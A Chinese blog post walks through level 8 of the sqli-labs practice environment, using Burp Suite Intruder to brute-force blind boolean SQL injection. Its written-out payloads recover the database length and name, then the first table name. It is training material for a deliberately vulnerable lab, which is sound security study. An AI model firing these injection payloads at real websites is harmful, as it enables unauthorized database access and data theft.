SQL-labs-Burp(第八关)


前言

在上篇文章中我们进行sqli-labs第八关时选择的是手注,可见过程是多么繁琐,因此在本文将会演示如何使用Burp作为辅助工具进行爆破

一、数据库长度

注入语句,进行爆破判断

?id=1' and length(database())=8 --+

抓包
在这里插入图片描述
进行爆破
在这里插入图片描述
处理数据
在这里插入图片描述
设置payload
在这里插入图片描述
进行攻击
在这里插入图片描述
判断出数据库的长度为:8

二、数据库名

在这里插入图片描述
代码块:?id=1' and ascii(substr(database(),1,1))=115 --+

抓包在这里插入图片描述
将字符的位置1,和对应ASCII码115设置为测试的数字,攻击类型设置为集束炸弹
在这里插入图片描述
设置payload
我们已经知道了数据库名称的长度为:8,因此
1、第一个参数的设置为1-8
在这里插入图片描述
2、设置第二个参数,数据库名是小写的26个字母,a-z的ASCII码是97-122
在这里插入图片描述
开始攻击
在这里插入图片描述
最后得到8个不一样的长度,正好对应数据库的名称:security

三、爆表名

大致流程与上面的方法是一致的
爆长度

?id=1'   and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 --+

在这里插入图片描述
在这里插入图片描述
长度为6
爆表

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) =101 --+

在这里插入图片描述
进行爆破
在这里插入图片描述
设置payload
在这里插入图片描述
设置有效载荷量其过程大致与上面差不多,只不过该表名的长度为6
在这里插入图片描述
在这里插入图片描述
爆破成功
在这里插入图片描述
对应ASCII码表,表名为:emails

总结

接下来对表的字段爆破以及字段信息的提取都依据上述的大概流程进行爆破,其实这样爆破虽然省下不少事但同时也要对注入语句进行学习才可以更加熟练。

  • 3
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值